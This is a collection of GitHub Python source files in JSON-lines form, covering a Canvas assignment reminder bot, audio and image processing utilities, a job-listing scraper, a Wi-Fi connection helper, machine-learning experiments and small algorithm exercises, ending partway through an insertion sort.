DATASET)\n","repo_name":"gpapadop79/ml-recsys-thesis","sub_path":"run_knn_surprise.py","file_name":"run_knn_surprise.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74839021266","text":"import pandas as pd\nfrom selenium import webdriver\nimport numpy as np\nimport datetime\nimport schedule\nimport time\n\nimport fbchat\nfrom fbchat import Client\nfrom fbchat.models import *\n\ndef send_reminder():\n\n #URL of all grade sections of canvas, and URL of messenger chat to send it to\n classes_people = [(\"url\",\"messenger url\")]\n \n #Canvas username and password stored in a file and read\n f = open(\"\")\n username = f.readline().replace(\"\\n\",\"\")\n password = f.readline()\n f.close()\n\n months = {\"Sep\": 9, \"Oct\":10, \"Nov\":11, \"Dec\":12}\n\n #Log into facebook in order to send messages\n file = open(\"\")\n email = file.readline().replace(\"\\n\",\"\")\n pw = file.readline()\n file.close()\n\n client = Client(email,pw)\n\n\n #Log into portal so you can access canvas in another tab\n #need access to chrom driver\n driver = webdriver.Chrome(\"chromedriver_win32/chromedriver.exe\")\n\n #url to log into the account the first time\n url = \" \"\n\n driver.get(url)\n\n driver.find_element_by_id(\"j_username\").send_keys(username)\n driver.find_element_by_id(\"j_password\").send_keys(password)\n driver.find_element_by_id(\"btn-eventId-proceed\").click()\n\n #loops through each url and group message\n for Class, chatID in classes_people:\n\n #loads the grades page and grabs the grades dataframe \n driver.get(Class)\n html = driver.page_source\n d = pd.read_html(html)\n\n grades = d[0]\n\n for num in range(len(grades)):\n #check to make sure its not empty\n if type(grades.loc[num][1]) == str:\n #gets each assignments due date\n ass_date = grades.loc[num][1].split(\" \")[:2]\n ass_month = months[ass_date[0]]\n try:\n ass_day = int(ass_date[1])\n except ValueError:\n ass_day = int(ass_date[1].strip().replace(\",\",\"\"))\n \n #gets the current assingment due date\n curr_month = datetime.datetime.now().month\n curr_day = datetime.datetime.now().day\n\n #checks if due date is equal to today's date\n if curr_day == ass_day and curr_month == ass_month:\n ass = grades.loc[num][0]\n time = \" \".join(grades.loc[num][1].split(\" \")[2:])\n\n #string to be sent\n messageString = \"{0} due {1}\".format(ass, time)\n \n #sends message\n client.send(Message(text=messageString), thread_id=chatID, thread_type=ThreadType.GROUP)\n\nsend_reminder()\n#change time to any\nschedule.every().day.at(\"18:23\").do(send_reminder)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)","repo_name":"alexmak001/CanvasMessengerAlerts","sub_path":"CanvasBot.py","file_name":"CanvasBot.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40150860402","text":"import numpy as np\nimport wave\n\ndef zoom(a, s1, s2, fr):\n \"\"\"\n Clip an array of wav data from s1 to s2 seconds\n\n :param a: The array of sound values\n :param s1: the start (in seconds)\n :param s2: the end (in seconds)\n \"\"\"\n start_i = int(s1 * fr)\n end_i = int(s2 * fr)\n return a[start_i:end_i]\n\ndef change_volume(a, m):\n \"\"\"\n Amplify the volume of an array of wav data my a multiplier\n\n :param m: multiplier of amplitude\n \"\"\"\n assert a.ndim == 2\n for i, row in enumerate(a):\n for j, val in enumerate(row):\n a[i, j] = min(val * m, np.iinfo(a.dtype).max)\n return a\n\ndef get_wav_data(fname):\n \"\"\"\n Get an array of wav data from a given .wav file.\n Return the frame rate also.\n\n :param fname: path of the .wav file\n \"\"\"\n with wave.open(fname, 'r') as f:\n arr = f.readframes(-1)\n arr = np.fromstring(arr, np.int16)\n arr = arr.reshape(len(arr)//2, 2)\n frrate = f.getframerate()\n\n return arr, frrate","repo_name":"SamL98/Sampler","sub_path":"wav_util.py","file_name":"wav_util.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15151065702","text":"#\n#\n#\n# New Company - Genos\n# Link to scrape -> https://www.genosdanmark.eu/vacancies\n#\nfrom A_OO_get_post_soup_update_dec import DEFAULT_HEADERS, update_peviitor_api\nfrom L_00_logo import update_logo\n#\nimport requests\nfrom bs4 import BeautifulSoup\n#\nimport uuid\n\n\ndef collect_data_from_genos():\n \"\"\"\n Collect data from Genos, from HTML.\n \"\"\"\n\n response = requests.get('https://www.genosdanmark.eu/vacancies',\n headers=DEFAULT_HEADERS)\n soup = BeautifulSoup(response.text, 'lxml')\n\n #\n soup_data = soup.find('div', class_='col-sm-12 col-md-8 col-lg-9').find_all('div', class_='row')[0]\n\n lst_with_data = []\n for dt in soup_data.find_all('div', class_='product-item'):\n link = dt.find('h4', class_='product-item__title').find('a')['href']\n title = dt.find('h4', class_='product-item__title').find('a').text\n\n lst_with_data.append({\n \"id\": str(uuid.uuid4()),\n \"job_title\": title,\n \"job_link\": 'https://www.genosdanmark.eu/' + link,\n \"company\": \"genos\",\n \"country\": \"Romania\",\n \"city\": \"Romania\"\n })\n\n return lst_with_data\n\n\n# update data on peviitor!\n@update_peviitor_api\ndef scrape_and_update_peviitor(company_name, data_list):\n \"\"\"\n Update data on peviitor API!\n \"\"\"\n\n return data_list\n\n\ncompany_name = 'genos'\ndata_list = collect_data_from_genos()\nscrape_and_update_peviitor(company_name, data_list)\n\nprint(update_logo('genos',\n 'https://www.genosdanmark.eu/uploads/images/logo-dark_27_12.png'\n ))\n","repo_name":"peviitor-ro/Scrapers_start_with_digi","sub_path":"sites/genos_scraper.py","file_name":"genos_scraper.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"42437616094","text":"# -*- coding: UTF-8 -*-\nimport os\nimport sys\n\nif __name__ == '__main__':\n path = sys.argv[1]\n text = sys.argv[2]\n result_file = path.split('/')[-1]\n parmas = [\n 'crop=\"800:650\"',\n 'scale=1080:-1',\n 'pad=1080:1920:0:550',\n \"delogo=x=1000:y=580:w=79:h=50\",\n 'drawtext=text=\"流金岁月\":fontfile=ttf/fan.ttf:x=210:y=230:fontsize=180:fontcolor=red',\n 'drawtext=text=\"beer\":fontfile=ttf/kai.ttf:x=900:y=500:fontsize=50:fontcolor=yellow',\n 'drawtext=text={}:fontfile=ttf/kai.ttf:x=w/2-text_w/2:y=1600:fontsize=80:fontcolor=yellow'.format(text),\n ]\n cmd = 'ffmpeg -i {} -vf {} -preset superfast -acodec copy final_{} -y'.format(path, ','.join(parmas), result_file)\n print(cmd)\n os.system(cmd)\n","repo_name":"yangyang5214/douyin","sub_path":"liu_jin_sui_yue/add_subtitle.py","file_name":"add_subtitle.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4060827931","text":"import re\nimport typing\n\nfrom launcher_menus.themes import menu, password_prompt\n\nfrom ..common import shell\n\n\ndef query_known() -> typing.List[str]:\n '''\n Query nmcli for known wifi APs\n\n Returns:\n Known Wifi AP names\n '''\n known_aps = []\n conn_pat = re.compile(r'(.+?) +?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12} wifi +')\n stdout = shell.process_comm('nmcli',\n 'connection',\n 'show',\n p_name='remembering')\n if stdout is None:\n # Error in process call. Let the user type\n return []\n for connection in stdout.split(\"\\n\"):\n wifi_conn = conn_pat.findall(connection)\n if wifi_conn:\n known_aps += wifi_conn\n return known_aps\n\n\ndef query_available() -> typing.List[str]:\n '''\n Query nmcli for available wifi APs\n\n Returns:\n Available Wifi AP names\n '''\n available_aps = []\n info_pat = re.compile(\n r'\\*? +(?:\\w{2}:){5}\\w{2} +(.+?) +\\w+? +\\d+ +.+? .+? +(\\d+?) +')\n stdout = shell.process_comm('nmcli',\n 'device',\n 'wifi',\n 'list',\n '--rescan',\n 'yes',\n p_name='discovering')\n if stdout is None:\n # Error in process call. Let the user type\n return []\n for info_str in stdout.split(\"\\n\"):\n grab = info_pat.findall(info_str)\n if grab:\n available_aps += grab\n return available_aps\n\n\ndef refresh_wifi(**_) -> int:\n '''\n Offer a available wifi APs to connect\n if the entered wifi ap is not known, request password\n\n connection success is flashed via ``notify``\n\n Args:\n all are ignored\n\n Returns:\n error code\n\n '''\n known_aps = query_known()\n available_aps = query_available()\n if not available_aps:\n shell.notify('No wifi network available', timeout=0)\n return 1\n choice = menu(opts=[\n ':'.join(info) for info in sorted(\n available_aps, key=(lambda x: int(x[-1])), reverse=True)\n ],\n prompt=\"connect to\")\n if choice is None:\n return 0\n choice, *_ = choice.split(\":\")\n cmd = ['nmcli', 'device', 'wifi', 'connect', choice.replace(' ', \"\\\\ \")]\n if choice not in known_aps:\n wifi_pass = password_prompt(opts=[], fail='notify')\n cmd += ['password', wifi_pass.replace(' ', \"\\\\ \")]\n stdout = shell.process_comm(*cmd, p_name='connecting')\n if stdout is None or 'error' in stdout.lower():\n shell.notify(f'Error connecting: {stdout}')\n return 1\n shell.notify(f'Connected to {choice}')\n return 0\n","repo_name":"pradyparanjpe/ppsi","sub_path":"ppsi/server/wificonnect.py","file_name":"wificonnect.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18311283014","text":"class Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n\n def getMaxArea(arrCuts, boundary):\n if arrCuts:\n arrCuts.sort()\n\n prev = 0\n total = 0\n for cut in arrCuts:\n currentCutSize = cut - prev\n prev = cut\n if total < currentCutSize:\n total = currentCutSize\n # We have to compute the size till the end in the last cut\n currentCutSize = boundary - cut\n if total < currentCutSize:\n total = currentCutSize\n else:\n total = boundary\n return total\n\n htotal = getMaxArea(horizontalCuts, h)\n vtotal = getMaxArea(verticalCuts, w)\n return vtotal * htotal % (10 ** 9 + 7)\n","repo_name":"AEstLo/LeetCode","sub_path":"1465_Maximum_Area_of_a_Piece_of_Cake_After_Horizontal_and_Vertical_Cuts.py","file_name":"1465_Maximum_Area_of_a_Piece_of_Cake_After_Horizontal_and_Vertical_Cuts.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42653445411","text":"import importlib\nimport os\nimport torch\nfrom omegaconf import OmegaConf, DictConfig\nfrom torch.utils import data\nimport numpy as np\nfrom src.datasets import TestDataset\nfrom src.logger import WandbLogger\nfrom src.utils import get_device, set_seeds, count_parameters\nfrom src.exceptions import InvalidTestModeException\nfrom tqdm.auto import tqdm\nfrom src.metrics import compute_metrics\nimport hydra\nimport pprint\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\n\nclass Tester:\n def __init__(self, config):\n self.config = config\n\n # get the device\n self.device = get_device()\n\n # define testing mode\n self.testing_mode = self.config.testing.mode\n\n # if the testing is a model testing\n if self.testing_mode == \"model\":\n\n # create the model\n self.model = getattr(importlib.import_module(\"src.models\"), config.testing.model)(\n input_channels=config.image_channels)\n\n # move model on device\n self.model = self.model.to(self.device)\n\n # load the weights from the saved file\n self.load(self.config.testing.output_model_file)\n\n # configure logger\n configuration = OmegaConf.to_object(config)\n pp = pprint.PrettyPrinter()\n pp.pprint(configuration)\n if config.wandb.logging:\n self.logger = WandbLogger(name=config.wandb.run_name, config=configuration,\n project=config.wandb.project_name, entity=config.wandb.entity_name)\n else:\n self.logger = None\n\n # create test dataloader from the given testing dataset\n test_dataset = TestDataset(config.test_dataset.path,\n scale=config.test_dataset.scale,\n degradation=config.test_dataset.degradation)\n self.test_dataloader = data.DataLoader(test_dataset,\n batch_size=config.test_dataset.batch_size,\n shuffle=config.test_dataset.shuffle,\n num_workers=config.test_dataset.num_workers,\n pin_memory=config.test_dataset.pin_memory)\n\n def __bicubic_upscale(self, lr, scale):\n # for each image in the batch\n upscaled = []\n for image in lr:\n # compute the output size of the upscaled image\n height = image.shape[0]\n width = image.shape[1]\n\n # compute the actual upscaled size of the upscaled image\n upscaled_height = int(height * scale)\n upscaled_width = int(width * scale)\n\n # image is currently in range 0-1 due to DataLoader, so to upscale it using PIL we need to \n # convert it to range 0-255\n image_255 = image * 255\n image_255 = image_255.astype(np.uint8)\n \n # upscale the image width bicubic\n upscaled_image = Image.fromarray(image_255)\n upscaled_image = np.asarray(upscaled_image.resize((upscaled_width, upscaled_height), Image.Resampling.BICUBIC))\n\n # restore 0-1 interval\n upscaled_image = upscaled_image / 255\n upscaled_image = upscaled_image.astype(np.float32)\n\n # append to the batch of upscaled images\n upscaled.append(upscaled_image)\n \n # convert the list of upscaled to numpy array and return\n return np.asarray(upscaled)\n\n def test(self):\n print(\"Testing...\")\n\n # set model to eval mode if testing is a model testing\n if self.testing_mode == \"model\":\n self.model.eval()\n\n # initialize testing metrics\n test_psnr = 0\n test_ssim = 0\n test_samples = 0\n test_sr_hr_comparisons = []\n\n # disable gradient computation\n with torch.no_grad():\n for scale, lr, hr in tqdm(self.test_dataloader, position=0):\n lr = lr.to(self.device)\n hr = hr.to(self.device)\n batch_size = lr.size()[0]\n\n # if testing is a model testing\n if self.testing_mode == \"model\":\n # do forward step in the model to compute sr images\n sr = self.model(lr, scale)\n\n # convert the sr image batch to numpy array and reshape to have channels in last dimension\n sr = sr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n # otherwise if testing mode is bicubic\n elif self.testing_mode == \"bicubic\":\n # convert the lr image batch to numpy array and reshape to have channels in the last dimension\n lr = lr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n # compute bicubic upscaled batch of sr images\n sr = self.__bicubic_upscale(lr, scale)\n\n # otherwise raise invalid testing mode exception\n else:\n raise InvalidTestModeException(f\"{self.testing_mode} is not a valid testing mode, change it to\",\n \"\\\"bicubic\\\" or \\\"model\\\"\")\n\n # convert the hr image batch to numpy array and reshape to have channels in last dimension\n hr = hr.cpu().detach().numpy().transpose(0, 2, 3, 1)\n\n # comupute psnr and ssim for the current testing batch\n psnr, ssim = compute_metrics(hr, sr)\n \n # add metrics of the current batch to the total sum\n test_samples += batch_size\n test_psnr += np.sum(psnr)\n test_ssim += np.sum(ssim)\n\n # create an image containing the sr and hr image side by side and append to the array of comparison\n # images\n sr_hr = np.concatenate((sr[0], hr[0]), axis=1)\n test_sr_hr_comparisons.append(sr_hr)\n\n # compute the average metrics value for the dataset\n test_psnr = round(test_psnr / test_samples, 2)\n test_ssim = round(test_ssim / test_samples, 4)\n\n # log the average psnr and ssim of the dataset and the images\n if self.logger:\n self.logger.log(\"test_psnr\", test_psnr, summary=True)\n self.logger.log(\"test_ssim\", test_ssim, summary=True)\n self.logger.log_images(test_sr_hr_comparisons[:self.config.wandb.n_images_to_log],\n caption=\"Left: SR, Right: ground truth (HR)\",\n name=\"Testing samples\", step=0)\n\n # print the metrics at the end of the epoch\n print(\"Samples:\", test_samples,\n \"\\n\\t- test psnr:\", test_psnr,\n \"\\n\\t- test ssim:\", test_ssim)\n\n return test_psnr, test_ssim, test_sr_hr_comparisons\n\n def load(self, filename: str) -> None:\n filename = f\"{filename}.pt\"\n trained_model_path = self.config.testing.model_folder\n if os.path.isdir(trained_model_path):\n file_path = f\"{trained_model_path}{filename}\"\n if os.path.isfile(file_path):\n print(f\"Loading model from {file_path}...\")\n weights = torch.load(file_path, map_location=torch.device(\"cpu\"))\n self.model.load_state_dict(weights)\n print(\"Done!\")\n else:\n print(\"The specified file does not exist in the trained models directory.\")\n else:\n print(\"The directory of the trained models does not exist.\")\n\n\n@hydra.main(version_base=None, config_path=\"../config/\", config_name=\"testing\")\ndef main(config: DictConfig):\n # set seeds for reproducibility\n if config.seed:\n set_seeds(config.seed)\n\n # create tester with the given testing configuration\n tester = Tester(config)\n\n # if testing is a model testing\n if config.testing.mode == \"model\":\n count_parameters(tester.model)\n\n # run the test\n tester.test()\n\n # if logging is enabled, finish the logger\n if config.wandb.logging:\n tester.logger.finish()\n\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"pierclgr/MPRNet-SR","sub_path":"src/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14648952991","text":"import numpy as np\nimport pickle as pickle\nfrom sklearn.model_selection import train_test_split\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport time\nimport warnings\n\n# np.random.seed() # shuffle random seed generator\n\n# Ising model parameters\nL = 40 # linear system size\nJ = -1.0 # Ising interaction\nT = np.linspace(0.25, 4.0, 16) # set of temperatures\nT_c = 2.26 # Onsager critical temperature in the TD limit\n\n# print(\"data import begin!\")\nf = open(\"Ising2DFM_reSample/Ising2DFM_reSample_L40_T%3DAll.pkl\", \"rb\")\ndata = pickle.load(f)\ndata = np.unpackbits(data).reshape(-1, 1600)\nlabel = pickle.load(open(\"Ising2DFM_reSample/Ising2DFM_reSample_L40_T%3DAll_labels.pkl\", \"rb\"))\nprint(\"data import end!\")\n\n# print(\"data divide begin!\")\n# divide data into ordered, critical and disordered\nX_ordered = data[:70000, :]\nY_ordered = label[:70000]\n# print(\"data divide ordered end!\")\n\nX_critical = data[70000:100000, :]\nY_critical = label[70000:100000]\n# print(\"data divide critical end!\")\n\nX_disordered = data[100000:, :]\nY_disordered = label[100000:]\n# print(\"data divide disordered end!\")\n# print(\"data divide end!\")\n\ndel data, label\n# print(\"data temple del!\")\n\ntrain_test_ratio = 0.9\ntest_train_ratio = 1-train_test_ratio\n# print(\"training and test data ratio set!\")\nprint(\"training_to_test ratio: %f\" % train_test_ratio)\n\n# print(\"define training and test data sets begin!\")\nX = np.concatenate((X_ordered, X_disordered))\nY = np.concatenate((Y_ordered, Y_disordered))\n\n# print(\"pick random data points to create the training and test sets\")\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, train_size=train_test_ratio, test_size=test_train_ratio)\nprint('X_train shape:', X_train.shape)\nprint('Y_train shape:', Y_train.shape)\nprint('X_test shape:', X_test.shape)\nprint('Y_test shape:', Y_test.shape)\nprint(\"training and test set end!\")\n\n# print(\"plot a few Ising states begin!\")\n# set colour bar map\n# colormap_args = dict(cmap='plasma_r')\n# fig = plt.figure()\n# ax = plt.axes()\n\n# plt.imshow(X_ordered[20001].reshape(L, L), **colormap_args)\n# plt.title('ordered phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n\n# plt.imshow(X_critical[10001].reshape(L, L), **colormap_args)\n# plt.title('critical phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n\n# plt.imshow(X_disordered[50001].reshape(L, L), **colormap_args)\n# plt.title('disordered phase')\n# plt.tick_params(labelsize=16)\n# plt.show()\n# print(\"plot a few Ising states end!\")\n\n# print(\"apply Random Forest begin\")\n\nwarnings.filterwarnings(\"ignore\")\n# Comment to turn on warnings\n\nnest_test = 20\nn_depth = 10\nn_sample_leaf = 10\n# print(\"tree para set end!\")\n\nmyRF_clf = RandomForestClassifier(\n n_estimators=nest_test,\n max_depth=n_depth,\n min_samples_split=n_sample_leaf, # minimum number of sample per leaf\n oob_score=True,\n random_state=0,\n warm_start=True # this ensures that you add estimators without retraining everything\n )\n\nprint('t_num: %i, t_dep: %i, sample/leaf: %i' % (myRF_clf.n_estimators, myRF_clf.max_depth, myRF_clf.min_samples_split))\n# print(\"RFC train begin!\")\nstart_time = time.time()\nmyRF_clf.fit(X_train, Y_train)\nrun_time = time.time() - start_time\nRFC_train_accuracy = myRF_clf.score(X_train, Y_train)\nRFC_OOB_accuracy = myRF_clf.oob_score_\nRFC_test_accuracy = myRF_clf.score(X_test, Y_test)\nRFC_critical_accuracy = myRF_clf.score(X_critical, Y_critical)\nresult = (run_time, RFC_train_accuracy, RFC_OOB_accuracy, RFC_test_accuracy, RFC_critical_accuracy)\nprint('{0:<15}{1:<15}{2:<15}{3:<15}{4:<15}'.format(\"time/s\", \"train score\", \"OOB estimate\", \"test score\", \"crit score\"))\nprint('{0:<15.4f}{1:<15.4f}{2:<15.4f}{3:<15.4f}{4:<15.4f}'.format(*result))\nprint(\"RFC train end!\")\nprint(\"%f\\t%f\\t%f\\t%f\" % (RFC_train_accuracy, RFC_OOB_accuracy, RFC_test_accuracy, RFC_critical_accuracy))\nexit()\n","repo_name":"yijie086/Code-for-computational-physics-class","sub_path":"hw9/hw91.py","file_name":"hw91.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"945415192","text":"__author__ = 'Shay Lapid'\n__email__ = 'lapidshay@gmail.com'\n\n##################################\n# Imports\n##################################\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom copy import deepcopy\nimport networkx as nx\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\n\n\n##################################\n# Anomalous Community Detector Utils\n##################################\n\ndef checkpoint_paths(dir_path: str = None, save: bool = False):\n\t# file names\n\ttrain_path = 'Train_Topological_Features.csv'\n\ttest_path = 'Test_Topological_Features.csv'\n\n\t# id save_dir_path is not given, use a default\n\tif dir_path is None:\n\t\tdir_path = os.path.join(os.getcwd(), 'Checkpoint')\n\n\tif save:\n\t\t# if dir path does not exist, create it\n\t\tif not os.path.exists(dir_path):\n\t\t\tos.mkdir(dir_path)\n\n\ttrain_path = os.path.join(dir_path, train_path)\n\ttest_path = os.path.join(dir_path, test_path)\n\n\treturn train_path, test_path\n\n\ndef load_topological_features_df(dir_path: str):\n\t# get train and test file paths\n\ttrain_path, test_path = checkpoint_paths(dir_path=dir_path, save=False)\n\n\t# read CSV files to DataFrames\n\ttrain_df = pd.read_csv(train_path, index_col=0)\n\ttest_df = pd.read_csv(test_path, index_col=0)\n\n\treturn train_df, test_df\n\n\n##################################\n# BiPartite Creator Utils\n##################################\n\n\ndef print_bipartite_properties(BPG, network: str = ''):\n\t\"\"\"Prints the properties of a bipartite graph.\"\"\"\n\n\tprops = get_bipartite_properties(BPG)\n\tpartite_1 = props['partite_1_label']\n\tpartite_2 = props['partite_2_label']\n\n\tprint(f\"{network} BiPartite network properties:\")\n\tprint(f\"\\tNumber of '{partite_1}'-partite vertices: {props['partite_1_num_vertices']}\")\n\tprint(f\"\\tNumber of '{partite_2}'-partite vertices: {props['partite_2_num_vertices']}\")\n\tprint(f\"\\tTotal number of vertices: {props['total_vertices']}\")\n\tprint(f\"\\tTotal number of edges: {props['total_edges']}\")\n\n\ndef get_bipartite_properties(BPG):\n\t\"\"\"Returns a dictionary with bipartite graph properties.\"\"\"\n\n\t# infer the 2 partites' labels\n\tpartite_1, partite_2 = _infer_bipartite_partite_labels(BPG)\n\n\t# get each partites' vertices\n\tpartite_1_vertices = _get_partite_vertices(BPG, partite_1)\n\tpartite_2_vertices = _get_partite_vertices(BPG, partite_2)\n\n\treturn {\n\t\t'partite_1_num_vertices': len(partite_1_vertices),\n\t\t'partite_2_num_vertices': len(partite_2_vertices),\n\t\t'partite_1_label': partite_1,\n\t\t'partite_2_label': partite_2,\n\t\t'total_vertices': len(BPG.nodes()),\n\t\t'total_edges': len(BPG.edges())\n\t}\n\n\ndef _infer_bipartite_partite_labels(BPG):\n\t\"\"\"Returns a list of 2 strings, the labels of the partites.\"\"\"\n\treturn list(set(nx.get_node_attributes(BPG, 'partite').values()))\n\n\ndef _get_partite_vertices(BPG, partite_label):\n\t\"\"\"Returns a list containing partite's vertices.\"\"\"\n\treturn [vertx for vertx in BPG.nodes(data=\"partite\") if vertx[1] == partite_label]\n\n\n##################################\n# LinkPredictor Utils\n##################################\n\ndef model_validation(model, X, y, val_size):\n\t\"\"\"Model performance evaluation\"\"\"\n\t# split to train and validation sets, and split data and labels\n\ttrain_X, val_X, train_y, val_y = train_test_split(X, y, test_size=val_size)\n\n\t# create a deep copy of classifier\n\tmodel_copy = deepcopy(model)\n\n\t# train model copy\n\tmodel_copy.fit(train_X, train_y)\n\n\t# calculate validation set scores\n\tvalidation_scores = get_classifier_scores(model_copy, val_X, val_y, 'validation')\n\treturn validation_scores\n\n\ndef get_classifier_scores(clf, X, y_true, data_name: str):\n\t\"\"\"Returns dictionary with scores.\"\"\"\n\n\t# predict X using classifier\n\ty_preds = clf.predict(X)\n\n\t# scores\n\tprc = metrics.precision_score(y_true, y_preds)\n\tacc = metrics.accuracy_score(y_true, y_preds)\n\tf1 = metrics.f1_score(y_true, y_preds)\n\tauc = None\n\tif len(np.unique(y_true)) == 2:\n\t\tauc = metrics.roc_auc_score(y_true, y_preds)\n\n\t# confusion metrics\n\ttn, fp, fn, tp = metrics.confusion_matrix(y_true, y_preds).ravel()\n\n\t# create a dictionary with all scores\n\toutput = {\n\t\tf'{data_name}_prc': prc,\n\t\tf'{data_name}_acc': acc,\n\t\tf'{data_name}_f1': f1,\n\t\tf'{data_name}_auc': auc,\n\t\tf'{data_name}_tn': tn,\n\t\tf'{data_name}_fp': fp,\n\t\tf'{data_name}_fn': fn,\n\t\tf'{data_name}_tp': tp\n\t}\n\n\treturn output\n\n\ndef print_scores_confusion_matrix(scores, data_name):\n\t\"\"\"Prints scores of a trained classifier given data to predict, and corresponding ground truth labels.\"\"\"\n\n\tcnf_str = f\"\"\"\n Predicted\n 0 1 \n ------------- \n 0 | {str(scores[f'{data_name}_tn']).ljust(4)} | {str(scores[f'{data_name}_fp']).ljust(4)} |\n True |-------------|\n 1 | {str(scores[f'{data_name}_fn']).ljust(4)} | {str(scores[f'{data_name}_tp']).ljust(4)} |\n ------------- \n \"\"\"\n\n\tscores_str = {\n\t\tf'Precision': scores[f'{data_name}_prc'],\n\t\t'Accuracy': scores[f'{data_name}_acc'],\n\t\t'F1': scores[f'{data_name}_f1'],\n\t\t'ROC AUC': scores[f'{data_name}_auc']\n\t}\n\n\tprint(f'{str(data_name).capitalize()} scores:')\n\t[print(f'\\t{str(k).ljust(10)}: {str(v)[:5]}') for k, v in scores_str.items()]\n\tprint(cnf_str)\n\n\ndef _index_tuple_literal_eval(string: str):\n\t\"\"\"Evaluates a string literal of form 'recipe_num, malt', and returns a tuple (recipe_num(int), malt(str)).\"\"\"\n\n\trec_malt = string[1:-1].split(', ')\n\trec = int(rec_malt[0])\n\tmalt = ', '.join(rec_malt[1:])\n\treturn rec, malt\n\n\ndef _index_tuple_literal_eval_with_ordering(string: str, comm_before_user: bool, vertex_to_int: bool):\n\t# split string of form \"(aa, xx, .., zz)\" to \"aa\" and [\"xx\", .., \"zz\"]\n\tcommunity, *vertex = string[1:-1].split(', ')\n\n\t# join vertex name components back to one string\n\tvertex = ', '.join(vertex)\n\n\t# if vertex name is a number, convert it to integer\n\tif vertex_to_int and vertex.isdigit():\n\t\tvertex = int(vertex)\n\n\t# determine the order of the tuple\n\treturn (community, vertex) if comm_before_user else (vertex, community)\n\n\ndef convert_literal_tuple_string_index_to_tuple(\n\t\tdf: pd.DataFrame, comm_before_user: bool = True, vertex_to_int: bool = False):\n\t\"\"\"\n\tConverts a DataFrame's literal string index of form '(community, vertex)' to a tuple (community, vertex) index.\n\n\tChanges input DataFrame inplace.\n\t\"\"\"\n\n\t# convert index to column\n\tdf.reset_index(level=0, inplace=True)\n\n\t# evaluate tuple literal\n\tdf['evaluated_index'] = [\n\t\t_index_tuple_literal_eval_with_ordering(\n\t\t\tstring=tup.index,\n\t\t\tcomm_before_user=comm_before_user,\n\t\t\tvertex_to_int=vertex_to_int)\n\t\tfor tup\n\t\tin df.itertuples()\n\t]\n\n\t# convert back to index\n\tdf.set_index('evaluated_index', inplace=True)\n","repo_name":"lapidshay/GenericAnomalousCommunitiesDetection","sub_path":"AnomalousCommunityDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69940740946","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport h5py\r\nimport pylab\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ntrainpath = str('C:/Users/49691/Desktop/数据集/train/')\r\ntestpath = str('C:/Users/49691/Desktop/数据集/test/')\r\nn_tr = len(os.listdir(trainpath))\r\nprint('num of training files: ', n_tr)\r\n\r\ntrain_labels = pd.read_csv('C:/Users/49691/Desktop/数据集/sample_submission.csv')\r\ntrain_labels.head()\r\n\r\nfrom skimage import io, transform\r\n\r\n\r\nx = np.empty(shape=(n_tr, 224, 224, 3))\r\ny = np.empty(n_tr)\r\n\r\nlabels = train_labels.invasive.values\r\nname = train_labels.name.values\r\n\r\npermutation=np.random.permutation(name.shape[0])\r\nprint(permutation)\r\nprint(labels[permutation])\r\nsave_data = pd.DataFrame({'name':permutation,'invasive':labels[permutation]})\r\nsave_data.to_csv('C:/Users/49691/Desktop/数据集/b.csv')\r\n\r\n\r\nfor k,v in enumerate(np.random.permutation(n_tr)):\r\n print(k,v)\r\n path = '{0}{1}.jpg'.format(trainpath, v)\r\n tr_im = io.imread(path)\r\n x[k] = transform.resize(tr_im, output_shape=(224, 224, 3))\r\n y[k] = float(labels[v-1])\r\n\r\n\r\n","repo_name":"leidaguo/picture_deal","sub_path":"shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24656517034","text":"List=[]\r\ndef InsertSort(List):\r\n print(\"输入对应12个月的需要排序的数据:\")\r\n for i in range(12):\r\n List.append(int(input()))\r\n for p in range(12):\r\n tmp=List[p]\r\n pos=p\r\n for q in range(p-1,-1,-1):\r\n if List[q]>tmp:\r\n List[q+1]=List[q]\r\n 